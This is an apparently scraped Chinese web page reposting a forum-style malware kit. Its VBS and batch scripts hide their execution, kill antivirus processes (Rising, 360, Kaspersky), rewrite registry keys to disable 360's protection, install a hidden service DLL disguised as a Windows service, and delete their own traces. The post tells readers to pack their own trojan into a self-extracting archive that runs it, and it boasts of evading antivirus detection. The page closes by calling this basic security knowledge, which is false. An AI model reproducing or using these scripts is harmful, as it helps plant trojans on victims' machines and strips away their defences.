<form id="hz9zz"></form>
    • <form id="hz9zz"></form>
    

      

      <nobr id="hz9zz"></nobr>
      <form id="hz9zz"></form>
      3.   
          
      明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!
                   
        
                           
        
                        		  
        
                 
              
                
      kill掉瑞星,金山,nod32,360
                
                  發表時間:2023-06-04             來源:明輝站整理相關軟件相關文章人氣:          
              
      [摘要]這里有到了兩個bat和兩個vbs+一個kill.  下面是源碼:  setdt.vbs的源碼:  set Cleaner=createobject("wscript.shell"...
      這里有到了兩個bat和兩個vbs+一個kill.
        下面是源碼:
        setdt.vbs的源碼:
        set Cleaner=createobject("wscript.shell") 
        Cleaner.run "setdt.bat",vbhide
      .......
        setdt.bat的源碼:
      @ECHO OFF
        @date /t>C:\time.txt
        date 1988-09-18
        hide.vbs
        @date <C:\time.txt
        del %SystemRoot%\system32\setdt.vbs
        del %SystemRoot%\system32\hide.vbs
        del %SystemRoot%\system32\command.exe
        del %SystemRoot%\system32\xKill.exe
        del %SystemRoot%\system32\xkill.bat
        del C:\time.txt
        del %0
      ..................
      hide.vbs的源碼:
        dim shell
        set shell=CreateObject("Wscript.Shell")
        WScript.Sleep 100000
        shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
        set Cleaner=createobject("wscript.shell") 
        Cleaner.run "xkill.bat",vbhide
        WScript.Sleep 100000
        shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
        ......................
      xkill.bat的源碼:
      @echo off
        taskkill /f /im rstray.exe >NUL
        taskkill /f /im 360tray.exe >NUL
        taskkill /f /im 360safe.exe >NUL
        echo Windows Registry Editor Version 5.00>>kill.reg 
        echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg 
        echo "MonAccess"=dword:00000000>>kill.reg 
        echo "SiteAccess"=dword:00000000>>kill.reg 
        echo "ExecAccess"=dword:00000000>>kill.reg 
        echo "UDiskAccess"=dword:00000000>>kill.reg 
        echo "LeakShowed"=dword:00000000>>kill.reg
        sc create DARK binpath= %windir%\System32\darkkill.dll
        sc config DARK start= disabled
        echo Windows Registry Editor Version 5.00>>dark.reg 
        echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg 
        echo "Type"=dword:00000110>>dark.reg 
        echo "Start"=dword:00000002>>dark.reg
        echo "ErrorControl"=dword:00000001>>dark.reg 
        echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg 
        echo   74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg 
        echo   00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg 
        echo   6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg 
        echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg 
        echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg 
        echo "DependOnGroup"=hex(7):00,00>>dark.reg 
        echo "ObjectName"="LocalSystem">>dark.reg 
        echo "Description"=hex(2):00,00>>dark.reg 
        echo
        echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg 
        echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg 
        echo   00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg 
        echo   72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg 
        echo
        echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg 
        echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg 
        echo   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg 
        echo   00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg 
        echo   05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg 
        echo   20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg 
        echo   00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg 
        echo   00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg 
        echo
        echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg 
        echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg 
        echo "Count"=dword:00000001>>dark.reg 
        echo "NextInstance"=dword:00000001>>dark.reg 
        regedit /s dark.reg
        regedit /s kill.reg
        COPY dark.dll %windir%\System32\darkkill.dll
        sc config DARK start= AUTO
        net start DARK
        attrib %windir%\System32\darkkill.dll +s +h
        del kill.reg
        del dark.reg
        del dark.dll
        del dark.exe
        xkill.exe
        taskkill /f /im kav.exe >NUL
        del %0
      本人不會編程,所以只好從vbs和bat入手了,感覺還不錯.
        至于xkill.exe,一個朋友給我的加殼軟件,他說這殼有后門,讓我看看能不能給去了
      我迷迷糊糊的把核心部分給提取了出來,又做了免殺處理.
      xkill.exe直接運行后可以結束掉瑞星,nod32,金山,其他沒測試過.
      不過還是建議你把xkill.exe和我這幾個vbs,bat一起使用,這樣還可以干掉360和卡卡,應該還可以破壞卡巴的主動防御
      如果你問我為什么不裝個卡巴試試,那么我機子上已經裝了5個安全軟件了,再裝個卡巴實在受不了~~
      大家不要把xkill.exe上傳到殺毒網上試試,曾經有一份真摯的免殺馬擺在我的面前,我沒有去珍惜.把它上傳到殺毒網上www.virustotal.com,結果........
      這個小工具請解壓后,將你的馬復制到解壓目錄,并重命名為command.exe,然后用winrar打包生成自解壓文件,選擇解壓后運行setdt.vbs

      上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




              
              
                 
              
                                            
                              		       
                          
                           		  
        
                            
      
日韩精品一区二区三区高清